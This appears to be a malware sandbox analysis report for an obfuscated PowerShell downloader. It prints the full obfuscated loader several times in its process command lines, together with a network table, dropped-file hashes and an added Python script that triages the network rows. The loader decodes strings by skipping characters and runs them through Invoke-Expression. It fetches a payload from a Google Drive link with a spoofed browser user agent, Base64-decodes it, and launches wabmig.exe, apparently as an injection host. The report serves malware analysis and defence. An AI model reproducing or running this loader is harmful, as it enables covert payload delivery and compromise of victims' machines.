Tildr=Prewr tachy[ dersSBararySe,resCatalt barheDaginmAra,a.Ha,roThalvaeClusixEn ydtConst.FyldeE Beh.nSu pacRaadioRugmedPantei,amblnU rangSvlge]Cor o:barse:AnecdABam uSpile COutbrIGreg,Iberve.V skeGBlowge PagitDdsfoSplacitNettor MyeliUndernOv rcgepemb(polys$Spo vDDea ljBrillvEvil e ParalkatjasMakrokInd ae Equas,esth)U der ');Talekanalen (Germania 'Bedst$BanjogAntislSk ifoSkovsbNeonsaUdgralAfskr:sw shI brennCoexitInspie ForbgNoteauNabofmBedyreGentanBortdtmrklaaAlrunlUndk,=Ta tr$MiscoDBjergySalinr ajortEjakui allid Bl,fetidsbrStentn N tae Anti. ompasAvelluAccombunfa.sRea rtGas.rr BelgiBestrnAsshog Scan( U,in$SlrinASu laf Li osSubvekLurdau a admNeissn Ov,riVigtenF gesgViolieUnscrr KontnBoysrean mas Om u, .ank$ Ro.tFLjpesrFasteaTilb,gSkakbtSuperrvil yaskrmmt,venee CamprfolkenTegnieunneu)Unren ');Talekanalen $Integumental;"

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Roborate.Uns && echo t"

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c ^"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe^" "<#Sulfamidic Gavelling Distributrnettet Torturingly Begunstige Confessionalism Crawley #>;$Ratebetalingsntercommunication='Humrforladtes';<#turnhalle Drouths Resistable Lighedspunkt Olu #>;$Ratebetalingsnteressefelt=$host.PrivateData;If ($Ratebetalingsnteressefelt) {$Didymitis++;}function Germania($Barnligt){$Citraternes142=$Barnligt.Length-$Didymitis;for( $Ratebetalings=5;$Ratebetalings -lt $Citraternes142;$Ratebetalings+=6){$Bladmaver+=$Barnligt[$Ratebetalings];}$Bladmaver;}function Talekanalen($Hjertebaandets){ & ($Remans) ($Hjertebaandets);}$Dermoreaction=Germania 'Fo urM He.toL giczCh lciSt yglmethol Sanda,xagg/Nonac5 ogn. Pole0ove.g Sa tl( HypoWS.mteiDruesnAfskidFremfo D giw SoubsSafir SkydeNKtterT,ylvt Inve1Lyso,0 lodt.Enami0Recur;Unrob Miz aWObl viMucednSilki6 Syre4Count;Fi ma ,eskxUdlej6Stnin4Catac;Perso Di.nfrUndisvSundh:Highh1U ion2Asy e1Tingh.Carra0Appr )Pikan .etsmGUdsaveMoistcForovk liosoForar/Unmil2Unpre0 ba a1Still0Swoon0T lre1Slage0 Ekse1 Aug ,utaFSubheiBr.ebrcholteHospif UartoKry,rxCofa /t kis1Nonpe2 bast1Intre. 
land0 vden ';$Ostealgia=Germania ' AlecUopt.gsNonseeTruckRglott- udieAOveraGRead EFeyesn D,miTRec l ';$Aerosiderolite=Germania 'FoundhLnpost Tehatart.rp be hsHeadr:Fem r/Hyper/Varmed ildr EnetiDrv yvK proeTrito.Ciss gMllesoMan eoTwop g HypolWieraeRegne.brndbcraakooLy phmDeuto/ReturuGispecF odh?KoloneGre.nxInfrepFuldaoLse rrZoophtBensk=BekosdUn onoSammewEctronVavasl AssuoFlageaArbejdnonme&R gioireassdPlanc=Pendl1SplenhEmbas3Ar owUKa.acp ildLDaareFforkmJBackwEPat lzAr ejo MelgG tinsrEsophSOrg,nvP rhaQSynsvRShiveqko stZUnderD egnf5 KvadMRedniUStudeuDyrenGreparb GonodA,cur3ArbouS Sa.tZ revaGPriviVAkkumSDupli ';$Datamaskinelles=Germania ' arce>melle ';$Remans=Germania 'RiddeIOutuseSu.erXGenti ';$Transmits='Dani';$Helhesten147 = Germania 'Me hjeRainfc Varih KoleoDupli Adels%EnthuaTrimnpTr.lnp.arvedTro ra.nwout Ciroa Perp% Il p\ EuctRHeraco Perob Enklo,jaltr otaa R,dgtUndereBivir.skat,UAutoinAn ihs Sprn Arbor&Salme&Water KanoneAlgaec.epiahHfligo lori Ass,ctBullb ';Talekanalen (Germania 'C eck$A damgTartel NutroMarnab ,upeaRanchlBnh e: YderGomstbaUnirrlEtn ge rrepnFaktoiSektetHelafeAl issRacem6,ispe9Ugand=Immes(S pplcT.kmlmSm ltdFored Beco,/Susp cMa hi Bumse$FastiH k lteSoapmlOpsonh.ilfleBasonsHy ektInco.eBes fnHns.r1Forge4Parmi7Sidia) Adon ');Talekanalen (Germania 'undko$RomavgFrag l RecaoLikv bEnchaaArbe.lKra,e:.tateOChevyufalsttSkrivsC mbup Par,aCratonGallesdiscr=Super$ UsikAGeodteOd.nsr Ant.oCribbsSpooniVirtudChicoekollerveksloUd,ollSlidsiHeltitLympheLyng . Ob us trep Cardlfuldbi L vetLaic,(Snegl$Un erD.odesaE.doctKropsaEnmarmRefraaHjlp sU.malkMetafi SrinnAcrobeTr.djl TraplImmoreUddansDemar)B lli ');Talekanalen (Germania 'Toned[SatinN ravmeOldfatPosth.DemokSF edaeIldskrFlyvevFrag.iR bidcViolieS.rapPDelegoMesmeiTrngsn ivertDy epMRepolaBemoun.amilaDummygCissoePanadrSp in]rdlig:Gavst:Hk.enSUnfeleBlegdcHalvfuE.orbrStartiSq,artTaktfy ubisPUnimirChrysojubustrem uoHippocPara oCosmolSyndi ecur=pu.le Spe c[ Imp NSol ie HebdtLetfa. 
CounSEgomaeUrinic RetsuYmperrProz iTe,mitAdapty PneuPOphidr T deo ArtetBill o tedfcPara o Forsl AnthTFo giy Consp Kn teS esk] Spin:Land :OutsoTCompalKropesMetap1Clyde2Disc ');$Aerosiderolite=$Outspans[0];$Superhistorical= (Germania 'Ge,yt$StorrgSvinelA.matO HypobSl.taA indl rif:N.ndiRSupraEGe,eiUD,fectDaaseI An elAscriiJ.ylesRembuI BagsNMalicgTripa=BirdsN Ops.E CintWMisco-T ombO NrinBVammeJnanniE CapacAmbleTAtten BjrkesTautoy ritcsSkilltFamoue wungm Vulv.Part.n LangeFleett Ydel. b.dwwKnfale PladBTryllC SideLSign I Kamme.pasmNUnr,pt');$Superhistorical+=$Galenites69[1];Talekanalen ($Superhistorical);Talekanalen (Germania 'Ch,et$forktRSlimmeDe.tsu EnketReobsiChlorl rocriDekorsUrethiDecyln Brang Stip. SprjHKatteeElemhaGuilfdBru ee SoverRew dsModfo[Kniks$ edraOBand skberntStatse nrasa ForblSo,acgMyrrhiLudolaBolth]Ove,b=Cryst$AntisDMaggieOpstnr c ramMultioVerdir PreyeEre oa ippecFunkttWindoiTrus.oUs.ornC,rne ');$Innest=Germania 'Desmo$ProviRDe igeAnisbuAdjutt Kar iBib,ilBadg.iNrsynsOrgani SekunPretagRe zi.OverdD.uftfoL kalwmanihn AsfmlMatrioJordba Hyald KosmF,lathi NonilBegree Ridg( part$barnaAM.sabeHorserP pilo Klges BrseiSke ldU aeneBarserTeleooDel,glSan,tiNavnltko mae Espa,Unath$ ErinMHampeeVegstrSekstoEf ulpRaadmi SupeaCompusHolla),ruta ';$Meropias=$Galenites69[0];Talekanalen (Germania 'He.mi$OverbGStikllEnligOso erBFeti,aP,efoLUefte:kulsoPSpknilKugleeSuperCPr sit Del,R .imaE Spor=Borup(MadagTMe,iaeEye oSGuldaTUefte-AnkomPAr,olANonentE helhSnob Rid,e$Dechem Ul,reN,rmaRIdnhkOFrostPFinjuiDenizABe iasSu,ps)Straf ');while (!$Plectre) {Talekanalen (Germania 'Cockn$ Ind.g OrielOd ntoSemi,bVr.ihaUnderl onna:HimmeBSensaoMalobrtrgretuntorlDim noFibrod etad L akeSuperrMet p=fr mk$FilostDisplrDupwaubyggeePhala ') ;Talekanalen $Innest;Talekanalen (Germania 'SyzygSFl.rttFu hia entrrSjlfutKopie-Ca vaSCivi l ,cieeIodo.eRingvpTredv Virre4Forud ');Talekanalen (Germania 'Fremt$StiktgPr aclKattioHydribUbehaaFrnnelClino: SkipPByguelTropieBrn,ec DiabtShemir Cavee 
Hand=Abiet(AmbolTSabl.eRehidsVov htAmmod-For rPMyofiaPiotetU neahSnegl Puff $SplinMJawtwe AntirFr vloSpitepatt niCo.ntaGlottsU ork)Skip ') ;Talekanalen (Germania 'Aphod$HoboigCy,tol Almbo.ekatbre teaS okklKnowi:SlaaeFskjoreBas.bcReferuGlgninBa bldPamp,aSkumgtGligaiGr skoSterlnVulpe= S or$phallgu clol Chono IndibRvesaaPussll Bevi: Sv tVCircue ortsr nodb ytmia UngalPol.iiDermazFrysee Feus+Fitti+Staff% .orm$ In,aO Vagtu DgndtSljens,rfabpHandsaTaut.nSt lds Rels.BackrcSkorpoLsgnguSe imn onktSpeci ') ;$Aerosiderolite=$Outspans[$Fecundation];}$Afskumningernes=320006;$Fragtraterne=29409;Talekanalen (Germania ' Endo$ VrksgFabullWetcho Its b Opt.aAmarylEksku:.kikkv.ndryaPedalaSnurpbPentae Ta.inFiffis KompmCalamuCul eg Telel dmugirigsanAt ragmi ros Ness Samp=Bevir NonsGAgoraeDublet eks-forsiCtineioDr ukn .glitMa cae ilbanVejentQuara Gedeh$ParocM CocheFinkmrQidnooSmertpLalpai UncaaOu,grsStrsk ');Talekanalen (Germania 'Glaum$VendigCreatl.oddeoMrk,pbBeaanaMentalWobl :SteriDBor ojForbivBilfoethermlskralsDo nwk,ncomeIn stsDe re Af.an=Shoes Kabin[LimfaS SavkyLaborsBatiktDetoneriddlmudp r.Eq iaCP ehaoSp ldnErganv Drape Cicar orldtPsi,o]Adj d:Jus i:AstraFUnvisrRe ieoBorgemReserBFirmaaStedesofficePref,6Impr,4Ma orSNonsutBarchrNyhediLnpronPossig elfr(humid$ t anvRe,isa TimoaPontibBorgeeVagtsnIntersRammemsmkreu,phthgGlyoxlFunktiAlsi.nP.ocegRecapsstruk)Adun ');Talekanalen (Germania 'Ragin$autofgPrecolKukstoSor ib C noa ollalPhosp:J.ledDAspiryScourrAlde,t ,yppi Videdsherie forhrOktaenVred eKron. 
Tildr=Prewr tachy[ dersSBararySe,resCatalt barheDaginmAra,a.Ha,roThalvaeClusixEn ydtConst.FyldeE Beh.nSu pacRaadioRugmedPantei,amblnU rangSvlge]Cor o:barse:AnecdABam uSpile COutbrIGreg,Iberve.V skeGBlowge PagitDdsfoSplacitNettor MyeliUndernOv rcgepemb(polys$Spo vDDea ljBrillvEvil e ParalkatjasMakrokInd ae Equas,esth)U der ');Talekanalen (Germania 'Bedst$BanjogAntislSk ifoSkovsbNeonsaUdgralAfskr:sw shI brennCoexitInspie ForbgNoteauNabofmBedyreGentanBortdtmrklaaAlrunlUndk,=Ta tr$MiscoDBjergySalinr ajortEjakui allid Bl,fetidsbrStentn N tae Anti. ompasAvelluAccombunfa.sRea rtGas.rr BelgiBestrnAsshog Scan( U,in$SlrinASu laf Li osSubvekLurdau a admNeissn Ov,riVigtenF gesgViolieUnscrr KontnBoysrean mas Om u, .ank$ Ro.tFLjpesrFasteaTilb,gSkakbtSuperrvil yaskrmmt,venee CamprfolkenTegnieunneu)Unren ');Talekanalen $Integumental;"

C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "<#Sulfamidic Gavelling Distributrnettet Torturingly Begunstige Confessionalism Crawley #>;$Ratebetalingsntercommunication='Humrforladtes';<#turnhalle Drouths Resistable Lighedspunkt Olu #>;$Ratebetalingsnteressefelt=$host.PrivateData;If ($Ratebetalingsnteressefelt) {$Didymitis++;}function Germania($Barnligt){$Citraternes142=$Barnligt.Length-$Didymitis;for( $Ratebetalings=5;$Ratebetalings -lt $Citraternes142;$Ratebetalings+=6){$Bladmaver+=$Barnligt[$Ratebetalings];}$Bladmaver;}function Talekanalen($Hjertebaandets){ & ($Remans) ($Hjertebaandets);}$Dermoreaction=Germania 'Fo urM He.toL giczCh lciSt yglmethol Sanda,xagg/Nonac5 ogn. Pole0ove.g Sa tl( HypoWS.mteiDruesnAfskidFremfo D giw SoubsSafir SkydeNKtterT,ylvt Inve1Lyso,0 lodt.Enami0Recur;Unrob Miz aWObl viMucednSilki6 Syre4Count;Fi ma ,eskxUdlej6Stnin4Catac;Perso Di.nfrUndisvSundh:Highh1U ion2Asy e1Tingh.Carra0Appr )Pikan .etsmGUdsaveMoistcForovk liosoForar/Unmil2Unpre0 ba a1Still0Swoon0T lre1Slage0 Ekse1 Aug ,utaFSubheiBr.ebrcholteHospif UartoKry,rxCofa /t kis1Nonpe2 bast1Intre. 
land0 vden ';$Ostealgia=Germania ' AlecUopt.gsNonseeTruckRglott- udieAOveraGRead EFeyesn D,miTRec l ';$Aerosiderolite=Germania 'FoundhLnpost Tehatart.rp be hsHeadr:Fem r/Hyper/Varmed ildr EnetiDrv yvK proeTrito.Ciss gMllesoMan eoTwop g HypolWieraeRegne.brndbcraakooLy phmDeuto/ReturuGispecF odh?KoloneGre.nxInfrepFuldaoLse rrZoophtBensk=BekosdUn onoSammewEctronVavasl AssuoFlageaArbejdnonme&R gioireassdPlanc=Pendl1SplenhEmbas3Ar owUKa.acp ildLDaareFforkmJBackwEPat lzAr ejo MelgG tinsrEsophSOrg,nvP rhaQSynsvRShiveqko stZUnderD egnf5 KvadMRedniUStudeuDyrenGreparb GonodA,cur3ArbouS Sa.tZ revaGPriviVAkkumSDupli ';$Datamaskinelles=Germania ' arce>melle ';$Remans=Germania 'RiddeIOutuseSu.erXGenti ';$Transmits='Dani';$Helhesten147 = Germania 'Me hjeRainfc Varih KoleoDupli Adels%EnthuaTrimnpTr.lnp.arvedTro ra.nwout Ciroa Perp% Il p\ EuctRHeraco Perob Enklo,jaltr otaa R,dgtUndereBivir.skat,UAutoinAn ihs Sprn Arbor&Salme&Water KanoneAlgaec.epiahHfligo lori Ass,ctBullb ';Talekanalen (Germania 'C eck$A damgTartel NutroMarnab ,upeaRanchlBnh e: YderGomstbaUnirrlEtn ge rrepnFaktoiSektetHelafeAl issRacem6,ispe9Ugand=Immes(S pplcT.kmlmSm ltdFored Beco,/Susp cMa hi Bumse$FastiH k lteSoapmlOpsonh.ilfleBasonsHy ektInco.eBes fnHns.r1Forge4Parmi7Sidia) Adon ');Talekanalen (Germania 'undko$RomavgFrag l RecaoLikv bEnchaaArbe.lKra,e:.tateOChevyufalsttSkrivsC mbup Par,aCratonGallesdiscr=Super$ UsikAGeodteOd.nsr Ant.oCribbsSpooniVirtudChicoekollerveksloUd,ollSlidsiHeltitLympheLyng . Ob us trep Cardlfuldbi L vetLaic,(Snegl$Un erD.odesaE.doctKropsaEnmarmRefraaHjlp sU.malkMetafi SrinnAcrobeTr.djl TraplImmoreUddansDemar)B lli ');Talekanalen (Germania 'Toned[SatinN ravmeOldfatPosth.DemokSF edaeIldskrFlyvevFrag.iR bidcViolieS.rapPDelegoMesmeiTrngsn ivertDy epMRepolaBemoun.amilaDummygCissoePanadrSp in]rdlig:Gavst:Hk.enSUnfeleBlegdcHalvfuE.orbrStartiSq,artTaktfy ubisPUnimirChrysojubustrem uoHippocPara oCosmolSyndi ecur=pu.le Spe c[ Imp NSol ie HebdtLetfa. 
CounSEgomaeUrinic RetsuYmperrProz iTe,mitAdapty PneuPOphidr T deo ArtetBill o tedfcPara o Forsl AnthTFo giy Consp Kn teS esk] Spin:Land :OutsoTCompalKropesMetap1Clyde2Disc ');$Aerosiderolite=$Outspans[0];$Superhistorical= (Germania 'Ge,yt$StorrgSvinelA.matO HypobSl.taA indl rif:N.ndiRSupraEGe,eiUD,fectDaaseI An elAscriiJ.ylesRembuI BagsNMalicgTripa=BirdsN Ops.E CintWMisco-T ombO NrinBVammeJnanniE CapacAmbleTAtten BjrkesTautoy ritcsSkilltFamoue wungm Vulv.Part.n LangeFleett Ydel. b.dwwKnfale PladBTryllC SideLSign I Kamme.pasmNUnr,pt');$Superhistorical+=$Galenites69[1];Talekanalen ($Superhistorical);Talekanalen (Germania 'Ch,et$forktRSlimmeDe.tsu EnketReobsiChlorl rocriDekorsUrethiDecyln Brang Stip. SprjHKatteeElemhaGuilfdBru ee SoverRew dsModfo[Kniks$ edraOBand skberntStatse nrasa ForblSo,acgMyrrhiLudolaBolth]Ove,b=Cryst$AntisDMaggieOpstnr c ramMultioVerdir PreyeEre oa ippecFunkttWindoiTrus.oUs.ornC,rne ');$Innest=Germania 'Desmo$ProviRDe igeAnisbuAdjutt Kar iBib,ilBadg.iNrsynsOrgani SekunPretagRe zi.OverdD.uftfoL kalwmanihn AsfmlMatrioJordba Hyald KosmF,lathi NonilBegree Ridg( part$barnaAM.sabeHorserP pilo Klges BrseiSke ldU aeneBarserTeleooDel,glSan,tiNavnltko mae Espa,Unath$ ErinMHampeeVegstrSekstoEf ulpRaadmi SupeaCompusHolla),ruta ';$Meropias=$Galenites69[0];Talekanalen (Germania 'He.mi$OverbGStikllEnligOso erBFeti,aP,efoLUefte:kulsoPSpknilKugleeSuperCPr sit Del,R .imaE Spor=Borup(MadagTMe,iaeEye oSGuldaTUefte-AnkomPAr,olANonentE helhSnob Rid,e$Dechem Ul,reN,rmaRIdnhkOFrostPFinjuiDenizABe iasSu,ps)Straf ');while (!$Plectre) {Talekanalen (Germania 'Cockn$ Ind.g OrielOd ntoSemi,bVr.ihaUnderl onna:HimmeBSensaoMalobrtrgretuntorlDim noFibrod etad L akeSuperrMet p=fr mk$FilostDisplrDupwaubyggeePhala ') ;Talekanalen $Innest;Talekanalen (Germania 'SyzygSFl.rttFu hia entrrSjlfutKopie-Ca vaSCivi l ,cieeIodo.eRingvpTredv Virre4Forud ');Talekanalen (Germania 'Fremt$StiktgPr aclKattioHydribUbehaaFrnnelClino: SkipPByguelTropieBrn,ec DiabtShemir Cavee 
Hand=Abiet(AmbolTSabl.eRehidsVov htAmmod-For rPMyofiaPiotetU neahSnegl Puff $SplinMJawtwe AntirFr vloSpitepatt niCo.ntaGlottsU ork)Skip ') ;Talekanalen (Germania 'Aphod$HoboigCy,tol Almbo.ekatbre teaS okklKnowi:SlaaeFskjoreBas.bcReferuGlgninBa bldPamp,aSkumgtGligaiGr skoSterlnVulpe= S or$phallgu clol Chono IndibRvesaaPussll Bevi: Sv tVCircue ortsr nodb ytmia UngalPol.iiDermazFrysee Feus+Fitti+Staff% .orm$ In,aO Vagtu DgndtSljens,rfabpHandsaTaut.nSt lds Rels.BackrcSkorpoLsgnguSe imn onktSpeci ') ;$Aerosiderolite=$Outspans[$Fecundation];}$Afskumningernes=320006;$Fragtraterne=29409;Talekanalen (Germania ' Endo$ VrksgFabullWetcho Its b Opt.aAmarylEksku:.kikkv.ndryaPedalaSnurpbPentae Ta.inFiffis KompmCalamuCul eg Telel dmugirigsanAt ragmi ros Ness Samp=Bevir NonsGAgoraeDublet eks-forsiCtineioDr ukn .glitMa cae ilbanVejentQuara Gedeh$ParocM CocheFinkmrQidnooSmertpLalpai UncaaOu,grsStrsk ');Talekanalen (Germania 'Glaum$VendigCreatl.oddeoMrk,pbBeaanaMentalWobl :SteriDBor ojForbivBilfoethermlskralsDo nwk,ncomeIn stsDe re Af.an=Shoes Kabin[LimfaS SavkyLaborsBatiktDetoneriddlmudp r.Eq iaCP ehaoSp ldnErganv Drape Cicar orldtPsi,o]Adj d:Jus i:AstraFUnvisrRe ieoBorgemReserBFirmaaStedesofficePref,6Impr,4Ma orSNonsutBarchrNyhediLnpronPossig elfr(humid$ t anvRe,isa TimoaPontibBorgeeVagtsnIntersRammemsmkreu,phthgGlyoxlFunktiAlsi.nP.ocegRecapsstruk)Adun ');Talekanalen (Germania 'Ragin$autofgPrecolKukstoSor ib C noa ollalPhosp:J.ledDAspiryScourrAlde,t ,yppi Videdsherie forhrOktaenVred eKron. 
Tildr=Prewr tachy[ dersSBararySe,resCatalt barheDaginmAra,a.Ha,roThalvaeClusixEn ydtConst.FyldeE Beh.nSu pacRaadioRugmedPantei,amblnU rangSvlge]Cor o:barse:AnecdABam uSpile COutbrIGreg,Iberve.V skeGBlowge PagitDdsfoSplacitNettor MyeliUndernOv rcgepemb(polys$Spo vDDea ljBrillvEvil e ParalkatjasMakrokInd ae Equas,esth)U der ');Talekanalen (Germania 'Bedst$BanjogAntislSk ifoSkovsbNeonsaUdgralAfskr:sw shI brennCoexitInspie ForbgNoteauNabofmBedyreGentanBortdtmrklaaAlrunlUndk,=Ta tr$MiscoDBjergySalinr ajortEjakui allid Bl,fetidsbrStentn N tae Anti. ompasAvelluAccombunfa.sRea rtGas.rr BelgiBestrnAsshog Scan( U,in$SlrinASu laf Li osSubvekLurdau a admNeissn Ov,riVigtenF gesgViolieUnscrr KontnBoysrean mas Om u, .ank$ Ro.tFLjpesrFasteaTilb,gSkakbtSuperrvil yaskrmmt,venee CamprfolkenTegnieunneu)Unren ');Talekanalen $Integumental;"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Roborate.Uns && echo t"

C:\Program Files (x86)\windows mail\wabmig.exe

"C:\Program Files (x86)\windows mail\wabmig.exe"

Network

Country  Destination            Domain                          Proto
US       8.8.8.8:53             217.106.137.52.in-addr.arpa     udp
US       8.8.8.8:53             drive.google.com                udp
GB       142.250.179.238:443    drive.google.com                tcp
US       8.8.8.8:53             drive.usercontent.google.com    udp
GB       142.250.187.225:443    drive.usercontent.google.com    tcp
US       8.8.8.8:53             240.143.123.92.in-addr.arpa     udp
US       8.8.8.8:53             67.31.126.40.in-addr.arpa       udp
US       8.8.8.8:53             95.221.229.192.in-addr.arpa     udp
US       8.8.8.8:53             238.179.250.142.in-addr.arpa    udp
US       8.8.8.8:53             225.187.250.142.in-addr.arpa    udp
US       8.8.8.8:53             97.17.167.52.in-addr.arpa       udp
GB       142.250.179.238:443    drive.google.com                tcp
US       8.8.8.8:53             c.pki.goog                      udp
GB       142.250.187.227:80     c.pki.goog                      tcp
US       8.8.8.8:53             o.pki.goog                      udp
GB       142.250.187.227:80     o.pki.goog                      tcp
GB       142.250.187.225:443    drive.usercontent.google.com    tcp
US       8.8.8.8:53             227.187.250.142.in-addr.arpa    udp
US       8.8.8.8:53             26.165.165.52.in-addr.arpa      udp
US       8.8.8.8:53             206.23.85.13.in-addr.arpa       udp
US       8.8.8.8:53             59.170.16.2.in-addr.arpa        udp
NL       104.248.205.66:80      -                               tcp
NL       104.248.205.66:80      -                               tcp
NL       104.248.205.66:80      -                               tcp
US       8.8.8.8:53             11.227.111.52.in-addr.arpa      udp
NL       104.248.205.66:80      -                               tcp
NL       104.248.205.66:80      -                               tcp
NL       104.248.205.66:80      -                               tcp

("-" in the Domain column: connection to a bare IP with no DNS name recorded for it.)
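
The table mixes three kinds of traffic: DNS to 8.8.8.8 (including reverse lookups, whose in-addr.arpa names carry an IP with its octets reversed), TLS to Google Drive plus HTTP to the Google PKI endpoints, and repeated plain-HTTP connections to one bare IP that never appears with a DNS name. The Python below is an added triage example for this page, not code from the report: it parses the rows as printed (copied in as constructed input, with "-" standing for an empty Domain cell), separates those categories, and cross-checks which contacted IPs also show up as reverse-lookup targets. The suffix lists used for categorising are assumptions; treating pki.goog traffic as certificate-validation noise and the bare-IP connections as the candidate C2 endpoint is an interpretation, not something the report states.

```python
import ipaddress
from collections import Counter

# Constructed input: the Network table from this report, one row per line as
# "country destination [domain] proto". "-" marks a row with no domain.
NETWORK_TABLE = """\
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
US 8.8.8.8:53 drive.google.com udp
GB 142.250.179.238:443 drive.google.com tcp
US 8.8.8.8:53 drive.usercontent.google.com udp
GB 142.250.187.225:443 drive.usercontent.google.com tcp
US 8.8.8.8:53 240.143.123.92.in-addr.arpa udp
US 8.8.8.8:53 67.31.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 238.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 225.187.250.142.in-addr.arpa udp
US 8.8.8.8:53 97.17.167.52.in-addr.arpa udp
GB 142.250.179.238:443 drive.google.com tcp
US 8.8.8.8:53 c.pki.goog udp
GB 142.250.187.227:80 c.pki.goog tcp
US 8.8.8.8:53 o.pki.goog udp
GB 142.250.187.227:80 o.pki.goog tcp
GB 142.250.187.225:443 drive.usercontent.google.com tcp
US 8.8.8.8:53 227.187.250.142.in-addr.arpa udp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 59.170.16.2.in-addr.arpa udp
NL 104.248.205.66:80 - tcp
NL 104.248.205.66:80 - tcp
NL 104.248.205.66:80 - tcp
US 8.8.8.8:53 11.227.111.52.in-addr.arpa udp
NL 104.248.205.66:80 - tcp
NL 104.248.205.66:80 - tcp
NL 104.248.205.66:80 - tcp
"""

# Assumed category lists: file-hosting services commonly abused for staging,
# and Google Trust Services CRL/OCSP hosts that TLS validation contacts anyway.
HOSTING_SUFFIXES = ("drive.google.com", "drive.usercontent.google.com")
PKI_SUFFIXES = (".pki.goog",)


def parse_rows(text):
    """Split the whitespace-separated table into dicts; domain may be absent or '-'."""
    rows = []
    for line in text.splitlines():
        fields = line.split()
        if not fields:
            continue
        if len(fields) == 4:
            country, dest, domain, proto = fields
        elif len(fields) == 3:
            country, dest, proto = fields
            domain = ""
        else:
            raise ValueError(f"unexpected row: {line!r}")
        if domain == "-":
            domain = ""
        ip, port = dest.rsplit(":", 1)
        rows.append({"country": country, "ip": ip, "port": int(port),
                     "domain": domain.lower(), "proto": proto.lower()})
    return rows


def ptr_to_ip(name):
    """'238.179.250.142.in-addr.arpa' -> '142.250.179.238' (octets are reversed)."""
    octets = name[: -len(".in-addr.arpa")].split(".")
    return str(ipaddress.ip_address(".".join(reversed(octets))))


def triage(rows):
    """Bucket the rows and relate reverse lookups to actual connections."""
    contacted = {r["ip"] for r in rows if r["port"] != 53}
    ptr_targets, hosting, pki, bare, other = set(), Counter(), Counter(), Counter(), Counter()
    for r in rows:
        d = r["domain"]
        if r["port"] == 53 and r["proto"] == "udp":
            if d.endswith(".in-addr.arpa"):
                ptr_targets.add(ptr_to_ip(d))
            continue  # forward lookups carry no more than the connection rows do
        endpoint = f'{r["ip"]}:{r["port"]}'
        if d.endswith(HOSTING_SUFFIXES):
            hosting[d] += 1
        elif d.endswith(PKI_SUFFIXES):
            pki[d] += 1
        elif d == "":
            bare[endpoint] += 1
        else:
            other[d] += 1
    return {
        "hosting": dict(hosting),
        "pki_noise": dict(pki),
        "bare_ip": dict(bare),
        "other": dict(other),
        "ptr_for_contacted": sorted(ptr_targets & contacted),
        "ptr_for_uncontacted": sorted(ptr_targets - contacted),
        "contacted_without_ptr": sorted(contacted - ptr_targets),
    }


if __name__ == "__main__":
    for key, value in triage(parse_rows(NETWORK_TABLE)).items():
        print(f"{key}: {value}")
```

On this table the three Google addresses that were contacted are also reverse-looked-up, while 104.248.205.66 is contacted six times over plain HTTP and never resolved in either direction, which is the row an analyst would carry forward as the endpoint to block and hunt for.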

Files

memory/4424-0-0x00007FFAAAD13000-0x00007FFAAAD15000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_xbfgndax.3tz.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4424-10-0x000001B385680000-0x000001B3856A2000-memory.dmp

memory/4424-11-0x00007FFAAAD10000-0x00007FFAAB7D1000-memory.dmp

memory/4424-12-0x00007FFAAAD10000-0x00007FFAAB7D1000-memory.dmp

memory/4424-14-0x00007FFAAAD13000-0x00007FFAAAD15000-memory.dmp

memory/4424-15-0x00007FFAAAD10000-0x00007FFAAB7D1000-memory.dmp

memory/4424-17-0x00007FFAAAD10000-0x00007FFAAB7D1000-memory.dmp

memory/3008-18-0x00000000024F0000-0x0000000002526000-memory.dmp

memory/3008-19-0x00000000050F0000-0x0000000005718000-memory.dmp

memory/3008-20-0x0000000004E30000-0x0000000004E52000-memory.dmp

memory/3008-21-0x0000000004ED0000-0x0000000004F36000-memory.dmp

memory/3008-22-0x0000000004FB0000-0x0000000005016000-memory.dmp

memory/3008-32-0x0000000005720000-0x0000000005A74000-memory.dmp

memory/3008-33-0x0000000005D20000-0x0000000005D3E000-memory.dmp

memory/3008-34-0x0000000005DB0000-0x0000000005DFC000-memory.dmp

memory/3008-35-0x0000000007550000-0x0000000007BCA000-memory.dmp

memory/3008-36-0x00000000062A0000-0x00000000062BA000-memory.dmp

memory/3008-37-0x0000000006FB0000-0x0000000007046000-memory.dmp

memory/3008-38-0x0000000006F40000-0x0000000006F62000-memory.dmp

memory/3008-39-0x0000000008180000-0x0000000008724000-memory.dmp

C:\Users\Admin\AppData\Roaming\Roborate.Uns

MD5 0b4940908143e7fa3180389a9b914557
SHA1 50985967f0dd7d2d8fdac35c66e6c066aba58aaf
SHA256 6e7664ac02af1fef33611b5150c64e285ca5c5bfda5bd555299c6df7b41f4d22
SHA512 eae1f4f22060ae85a31013cf9b904429e914018188eb519135e9ee747ff35b6a6426f665cd61cfb8724908658d11e80deb483901f4357c10cb5d207cb352e299

memory/3008-41-0x0000000008730000-0x000000000BAD6000-memory.dmp

memory/4424-42-0x00007FFAAAD10000-0x00007FFAAB7D1000-memory.dmp

memory/3332-43-0x0000000001250000-0x00000000045F6000-memory.dmp

memory/3332-57-0x0000000001250000-0x00000000045F6000-memory.dmp

memory/4424-60-0x00007FFAAAD10000-0x00007FFAAB7D1000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-1194130065-3471212556-1656947724-1000\0f5007522459c86e95ffcc62f32308f1_a53bb4ca-6113-48bb-9609-441860fdd0d7

